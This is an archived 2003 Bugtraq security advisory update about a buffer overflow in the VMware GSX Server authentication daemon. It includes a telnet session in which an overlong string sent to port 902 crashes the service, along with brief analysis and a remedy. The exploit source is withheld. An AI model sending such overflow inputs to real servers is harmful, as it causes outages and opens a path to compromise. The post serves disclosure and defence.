VMWare GSX Server Authentication Server Buffer Overflow Vulnerability - Update

From: Darryl Swofford (dswofford_at_kpmg.com)
Date: 10/31/03

  • Next message: advisories: "Corsaire Security Advisory: BEA WebLogic example InteractiveQuery.jsp XSS issue"
    Date: 31 Oct 2003 16:28:55 -0000
    To: bugtraq@securityfocus.com
    
    
    ('binary' encoding is not supported, stored as-is)

    Author: Darryl Swofford
    Email: dswofford@kpmg.com

    Date: 2003/10/31

    System:
    VMware GSX Server 2.0.1 build-2129 for Windows (other versions not tested). Tested on Windows NT/2000/2003/XP systems.

    Description:
    After reviewing BugTaq #5294 (VMWare GSX Server Authentication Server Buffer Overflow Vulnerability) I was able to modify the sample code to exploit the updated vmware-authd service.

    I will not release the source code as I feel this is not prudent until the vendor acknowledges the issue. Until then you can view the overflow by using telnet with the following syntax and simply alter the code as I did.

    >telnet VMserver.somecompany.com 902
    > 220 VMware Authentication Daemon Version 1.00
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA599 vmware-authd
     PANIC: Buffer overflow in VMAuthdSocketRead()
    >
    Connection to host lost.

    Analyses:
    It seems that the vmware-authd service limits the input strings of the program when passed correct arguments (USER, PASS, GLOBAL); however the initial readline can be overflowed as it does not control the amount of data passed to it.
     
    Remedy:
    Stop and disable the VMware authorization service.


  • Next message: advisories: "Corsaire Security Advisory: BEA WebLogic example InteractiveQuery.jsp XSS issue"

    Relevant Pages

    • VMware GSX Server Remote Buffer Overflow
      ... VMware GSX Server Remote Buffer Overflow ... VMware GSX Server 2.0.0 build-2050 for Windows ... There is a buffer overflow vulnerability on VMware Authorization ...
      (Bugtraq)
    • [NT] VMware GSX Server Remote Buffer Overflow (GLOBAL)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... VMware GSX Server is a very popular virtualization software, ... There is a buffer overflow vulnerability in the VMware ...
      (Securiteam)
    • Re: Security Issues....
      ... Any vmware users out there have any comments? ... VMware has the concept of a virtual computer that will not commit changes ... take a look at VMware GSX server. ...
      (RedHat)
    • Re: VMWare on SBS server
      ... VMWare on SBS, are you CRAZY? ... VMWare Workstation is exactly what it's name suggests, ... VMWare GSX Server should be installed on a machine dedicated to the process, ...
      (microsoft.public.windows.server.sbs)